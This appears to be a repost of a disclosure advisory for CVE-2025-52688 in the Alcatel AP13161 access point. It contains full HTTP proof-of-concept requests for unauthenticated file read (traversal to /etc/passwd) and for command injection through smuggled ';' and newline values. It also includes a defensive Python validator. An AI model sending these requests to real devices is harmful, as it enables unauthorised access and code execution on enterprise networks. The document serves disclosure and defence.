Alcatel AP13161 Command Injection and File Read Vulnerabilities

Vulnerability Information

Vulnerability name: Alcatel AP13161 command injection and file read vulnerabilities

Vulnerability identifier:

  • CVE: CVE-2025-52688

Vulnerability type: command execution

Severity: high

Vulnerability description: The Alcatel AP13161 is an enterprise-grade WiFi access point, widely deployed in corporate networks to provide wireless access. The device has two main security vulnerabilities: first, several JSON web parameters lack input sanitization, allowing malicious characters such as ; to be injected and leading to command injection; second, the fileName parameter lacks proper sanitization and access control, allowing unauthorized users to read arbitrary files on the server. The technical root cause of both vulnerabilities is improper validation of user input combined with missing access control. An attacker can exploit them to execute remote code or read sensitive files without any authentication, which poses a serious threat to enterprise network security. Specifically, the command injection vulnerability allows an attacker to execute arbitrary system commands on the device, potentially leading to full compromise of the device; the file read vulnerability can leak sensitive information such as password files. Exploitation can be automated, which increases both the risk and the scope of impact.

Vendor: Alcatel

Product: AP13161

Source: https://github.com/joelczk/CVE-2025-52688

Type: CVE-2025:github search

Repository files

  • README.md

Source overview

CVE-2025-52688

Affected Products

Alcatel AP13161 - Enterprise WIFI access point

Summary

There are 2 main vulnerabilities being addressed here:

  • Lack of input sanitization on multiple JSON web parameters that allows malicious characters such as ; to be injected, causing a command injection attack
  • Lack of proper sanitization and access control on the fileName parameter that allows unauthorized arbitrary file read on the server

This vulnerability was discovered during the SPIRICYBER-24 IoT/OT Hackathon organized by CSA (Cybersecurity Agency of Singapore) & NTU

POC

File Read POC

The fileName parameter allows any unauthenticated user to view any file on the system. By traversing through the directories, we are able to read sensitive files on the server

```http
POST /echo.fcgi HTTP/1.1
Host: XXXXX
User-Agent: Mozilla/5.0 (Linux; U; Android 7.0; en-us; MI 5 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.146 Mobile Safari/537.36 XiaoMi/MiuiBrowser/9.0.3
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 110
Connection: keep-alive

{
  "id": 1,
  "jsonrpc": "2.0",
  "username": "xxx",
  "method": "downloader.cert",
  "params": {
    "fileName": "/../../etc/passwd"
  }
}
```

RCE POC #1

The password parameter on the /apiaccess endpoint is vulnerable to an unauthenticated command injection vulnerability that allows any unauthenticated user to execute system commands

```http
POST /apiaccess HTTP/1.1
Host: XXXX
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

{
  "id": 1,
  "jsonrpc": "2.0",
  "method": "system.getPvc",
  "params": {
    "username": "Administrator",
    "password": ";echo pwned1234 > /tmp/test.txt"
  }
}
```

RCE POC #2

The username parameter on the echo.fcgi endpoint is vulnerable to an unauthenticated command injection vulnerability that allows any unauthenticated user to execute system commands

```http
POST /echo.fcgi HTTP/1.1
Host:
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: application/json, text/plain, */*

{
  "id": 1,
  "jsonrpc": "2.0",
  "username": "Administrator",
  "method": "user.logout",
  "params": {
    "username": ";echo pwned > /tmp/test.txt",
    "Sessionid": ""
  }
}
```

RCE POC #3

The command parameter allows authenticated users to execute system functions and binaries to test the functionality of the lamp post. However, due to insufficient input filtering and an incomplete blacklist, we are able to bypass the filters to achieve authenticated remote code execution, which allows any logged-in user to execute system commands

```http
POST /echo.fcgi HTTP/1.1
Host: XXXX
Content-Length: 349
Accept: application/json, text/plain, */*
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{
  "id": 1,
  "jsonrpc": "2.0",
  "method": "expressmessage.call",
  "username": "Administrator",
  "session": "XXXXXX",
  "topic": "WMA/DC:XXXXXXX",
  "params": {
    "version": "3.0",
    "messageID": 1,
    "macAddress": "DC:XXXXX",
    "option": "update",
    "method": "ap_manage.exce_command",
    "contents": {
      "command": "tech_support_command 9 127.0.0.1\nid"
    }
  }
}
```
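The three POCs above share two root causes: a fileName that is joined onto a server path without confinement, and string parameters that reach a shell with separators such as `;` or a newline intact. As an added defensive example, not part of the advisory or the joelczk repository, the following Python check validates a JSON-RPC body before it reaches a handler; the allowed certificate directory /var/certs is an assumed placeholder, and the sample bodies are constructed from the POCs.

```python
import json
import posixpath
import re

# Characters a shell treats as command separators or substitution; a username,
# password or command argument that reaches a shell must never contain them.
SHELL_META = re.compile(r"[;|&`\r\n]|\$\(")

# Assumed directory that downloader.cert may serve from (placeholder value).
CERT_DIR = "/var/certs"

def escapes_directory(base, file_name):
    """True if base/file_name normalises to a path outside base (traversal).
    An absolute file_name replaces base in join(), so that case is caught too.
    base must not be "/"; real servers should also resolve symlinks."""
    base = posixpath.normpath(base)
    full = posixpath.normpath(posixpath.join(base, file_name))
    return full != base and not full.startswith(base + "/")

def scan_request(raw_body):
    """Findings for one JSON-RPC body: traversal in params.fileName and shell
    metacharacters in any string field, nested 'contents' included."""
    try:
        req = json.loads(raw_body)
    except ValueError:
        return ["body is not valid JSON"]
    if not isinstance(req, dict):
        return ["body is not a JSON object"]
    findings = []
    method = req.get("method", "?")
    file_name = (req.get("params") or {}).get("fileName")
    if isinstance(file_name, str) and escapes_directory(CERT_DIR, file_name):
        findings.append(f"{method}: fileName leaves {CERT_DIR}: {file_name!r}")
    stack = [("request", req)]          # depth-first walk over every value
    while stack:
        path, node = stack.pop()
        if isinstance(node, dict):
            stack.extend((f"{path}.{k}", v) for k, v in node.items())
        elif isinstance(node, str) and SHELL_META.search(node):
            findings.append(f"{method}: shell metacharacter in {path}: {node!r}")
    return findings

# Constructed sample bodies modelled on the advisory's POCs plus one benign call.
SAMPLES = {
    "file_read": '{"id":1,"jsonrpc":"2.0","method":"downloader.cert",'
                 '"params":{"fileName":"/../../etc/passwd"}}',
    "password": '{"id":1,"jsonrpc":"2.0","method":"system.getPvc","params":'
                '{"username":"Administrator","password":";echo pwned1234 > /tmp/test.txt"}}',
    "benign": '{"id":1,"jsonrpc":"2.0","method":"downloader.cert",'
              '"params":{"fileName":"ap.crt"}}',
}
```

Rejecting on these findings is the mitigation; the proper fix on the device side is to never pass these fields to a shell at all and to open fileName only after confinement to the certificate directory.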

Timeline

2024-08-10: Report submitted to SpiritCyber IoT Hackathon triage team

2024-08-20: Report accepted by triage team

2025-06-25: CSA SingCert assigns CVE-2025-52688

2025-07-14: Public disclosure

Advisory

https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-072

https://www.al-enterprise.com/-/media/567414972b57459697030898f92ac043.pdf

http://example.com/2025/07/16/github_3160355198/
Author: lianccc
Published: 16 July 2025